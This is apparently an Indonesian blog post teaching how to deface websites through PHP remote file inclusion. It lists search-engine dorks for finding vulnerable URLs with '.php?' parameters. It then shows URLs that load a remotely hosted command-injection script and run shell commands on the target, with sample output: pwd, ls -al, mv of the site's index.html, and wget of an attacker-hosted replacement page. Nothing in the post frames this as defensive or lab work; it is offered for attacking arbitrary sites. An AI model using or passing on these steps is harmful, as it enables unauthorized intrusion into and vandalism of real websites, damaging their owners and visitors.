Sekarang anda bisa menggunakan php inject tersebut untuk deface web atau yang lainya. Sekrang buka search engine anda dengan keyword atau allinurl: index.php?*=* atau main.php?*=* atau module.php?*=* dan banyak lagi. Usahakan cari target yang urlnya mengandung tanda tanya ".php?"
contoh : www.targetanda.com/index.php?id=12 atau www.targetanda.com/main.php?content=ayam.
Kemudian hapus semua tulisan yang ada dibelakang "=" yang paling dekat dengan ".php?" kemudian ganti dengan alamat url php inject anda di upload. Misal saya menggunakan php inject ini http://geocities.com/rhiend_masters/inject.htm?&cmd=id dan target kita misalkan :
www.targetanda.com/index.php?id=12 sehingga urlnya menjadi :
www.targetanda.com/index.php?id=http://geocities.com/xbejat/inject.htm?&cmd=pwd
cari target anda sampai keluar :
--------------------------------------------------------------------------------
/home/bejat/public_html/
--------------------------------------------------------------------------------
intinya harus keluar seperti ini /home/mela/public_html/ kalau tidak ada, silakan tinggalkan target. Jika sudah dapat target lihat isi file yang ada didalam folder tersebut dengan perintah ls -al urlnya menjadi :
www.targetanda.com/index.php?id=http:// geocities.com/xbejat/inject.htm?&cmd=ls -al
nanti anda akan melihat seperti ini :
total 1023
drwxrwxrwx 100 nobody nobody 43203 temp
drwx---rw- 3 nobody nobody 1234 shop
drwxr-xr-x 11 nobody nobody 23421 images
drwx------ 1000 nobody nobody 12345 cache
-rwxr-xr-x 1 nobody nobody 1234 index.html
-rwxrwxrwx 1 nobody nobody 2332 bejat.jpg
Anda hanya bisa mendownload file kedalam web tersebut jika permisinnya mendukung. Lihat tanda drwxr-xr-x semua yang ada tanda d -nya berarti folder sedangkan yang lainnya file. folder yang mendukung untuk melakukan download mengganti nama file dan sebagainya jika bentuknya seperti ini drwxrwxrwx, silahkan anda belajar tentang dasar-dasar linux. Jika anda ingin mendeface simpan web karya anda yang ingin ditampilkan ditarget pada webhosting lain dengan nama index.html. Kemudian lakukan perintah ini dengan php inject anda : mv index.html backup.html ==> mengganti nama file index.html, contoh perintahnya :
www.targetanda.com/index.php?id=http://geocities.com/xbejat/inject.htm?&cmd=mv index.html backup.html.
Maka filenya berubah menjadi seperti ini saat anda menjalankan perintah ls -al:
total 1023
drwxrwxrwx 100 nobody nobody 43203 temp
drwx---rw- 3 nobody nobody 1234 shop
drwxr-xr-x 11 nobody nobody 23421 images
drwx------ 1000 nobody nobody 12345 cache
-rwxr-xr-x 1 nobody nobody 1234 backup.html
-rwxrwxrwx 1 nobody nobody 2332 bejat.jpg
Lalu download lah file anda dengan perintah wget http://hosting_anda.com/ index.html, contoh perintahnya :
www.targetanda.com/index.php?id=http://geocities.com/xbejat/inject.htm?&cmd=wget http://hosting_anda.com/index.html.
total 1023
drwxrwxrwx 100 nobody nobody 43203 temp
drwx---rw- 3 nobody nobody 1234 shop
drwxr-xr-x 11 nobody nobody 23421 images
drwx------ 1000 nobody nobody 12345 cache
-rwxr-xr-x 1 nobody nobody 1234 index.html
-rwxr-xr-x 1 nobody nobody 1234 backup.html
-rwxr-xr-x 1 nobody nobody 2332 bejat.jpg
Nah Sekarang coba lihat web target anda apa yang terjadi www.hosting_target.com/index.html Anda bisa mencoba perintah-perintah lainya seperti locate nama_file dan perintah unix lainnya.
Tidak ada komentar:
Posting Komentar